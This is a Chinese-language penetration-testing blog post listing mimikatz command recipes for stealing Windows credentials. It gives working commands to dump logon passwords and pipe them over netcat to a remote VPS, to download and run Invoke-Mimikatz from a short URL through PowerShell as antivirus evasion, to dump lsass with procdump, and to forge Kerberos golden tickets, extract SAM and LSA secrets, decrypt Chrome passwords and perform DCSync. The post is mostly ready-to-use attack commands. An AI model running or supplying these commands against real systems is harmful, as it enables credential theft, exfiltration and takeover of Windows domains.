【渗透技巧】mimikatz使用技巧

mimikatz平时一般使用技巧

0x00 非交换式

打印(输出)mimikatz执行过程的log

1
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

读取的密码导出在mimikatz的目录,然后用webshell 将log文件copy到web下,在线访问

1
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

nc到vps

非交互抓明文,不留任何文件,直接把抓取结果用nc发到指定的远程机器(一般是自己的vps)上,可能有些端口出不来,换几个常用的即可,80,8080,443,53……

1
2
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit |  nc -vv 192.168.3.251 1234  在目标机器上执行
nc -lvp 1234 本地(vps上)机器执行

0x01 两种免杀方式

1) 使用powershell

1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

Tips:powershell 默认windows visa后才有。也可以将结果发送到vps上。

2) procdump lsass 进程导出

1
2
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
  • 本地使用mimikatz还原
    1
    2
    3
    mimikatz.exe
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full

0x02 日常使用

1) 黄金票据

1
2
3
4
5
[*] 制作
mimikatz # kerberos::golden /krbtgt:26e67be3519825ba5c9f4f95af987fac /admin:Administrator /domain:rcoil.me /sid:S-1-5-21-3847150913-2250841228-2965060751 /ticket:Administrator.kiribi
[*] 使用
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt

2) 获取 vpn 密码

1
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

3) 浏览器密码

1
mimikatz.exe privilege::debug log "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data1\" /unprotect" exit //读chrome密码

4) 获取某用户的密码

1
mimikatz lsadump::dcsync /domain:rcoil.me /user:rcoil
RcoIl Alipay
!坚持技术分享,您的支持将鼓励我继续创作!